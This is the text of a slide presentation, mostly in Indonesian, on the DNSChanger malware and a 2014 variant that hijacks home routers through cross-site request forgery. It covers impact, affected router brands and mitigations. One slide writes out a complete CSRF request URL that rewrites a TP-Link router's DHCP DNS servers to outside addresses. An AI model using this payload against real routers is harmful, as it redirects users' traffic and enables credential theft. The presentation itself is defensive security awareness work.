DNSchanger 2014DNSchanger 2014

Alfons Tanujaya

DNSchanger 2007

• Aktif 2007 - 2011

• Infeksi lebih dari 4 juta komputer PC dan Mac

• Online adv, spam, scam

• Keuntungan 140 milyar

• 8 Maret 2012, server bring down, kiamat kecil internet ?

DNSchanger 1

DNSChanger 2014 Symptom

What is this ?

• Antivirus merek apapun tidak bisa mengatasi malware ini.

• Tidak hanya berdampak pada Windows tetapi pada Linux, Mac dan Android phone.

• Sekalipun komputer di format, akan kembali lagi terjadi.

Sea-surf = CSRF

CSRF Cross Site Request Forgery

• A type of malicious exploit of a website whereby unauthorized commands are transmitted from a user that the website trusts. Unlike cross-site scripting (XSS), which exploits the trust a user has for a particular site, CSRF exploits the trust that a site has in a user's browser.

• Attack is blind. Not good for credential stealing.

• But ordinary weapon in a smart criminal can be deadly.

DNSChanger 2014

• Changing DNS of vulnerable routers.

• Log all traffic proxy, credential leak.→• Lead to install malware.

• Lead to forgery website, can lead to leak of credential.

• Improper advertisement, porn, malware etc.

• How many victims ? 300.000 routers x 5 users = 1,5 million computers.

How it happen

http://192.168.1.1/userRpm/LanDhcpServerRpm.htm?dhcpserver=1&ip1=192.168.1.100&ip2=192.168.1.199&Lease=120&gateway=0.0.0.0&domain=&dnsserver=162.248.99.162&dnsserver2=199.85.127.10&Save=%B1%A3+%B4%E6

List of vulnerable routers

• TP Link

• D-Link

• Micronet

• Tenda

Solution

Sea SurfSEA MONKEY

SOLUSI

• Upgrade firmware Tidak selalu sukses←• → OpenWRT

• Solusi, set dns di client dgn DNS isp / google, local DNS overpower router, kecuali dipaksa router

• T-FA Challenge token

• Tidak gunakan web based administration

• Gunakan https

• Gunakan browser berbeda khusus untuk administrasi router berbeda dengan browsing

get

Login form

Session Cookie

UNPS

Post Cookie

get

Auto submit form

Post Cookie

Resource

• http://cxsecurity.com/issue/WLB-2012100027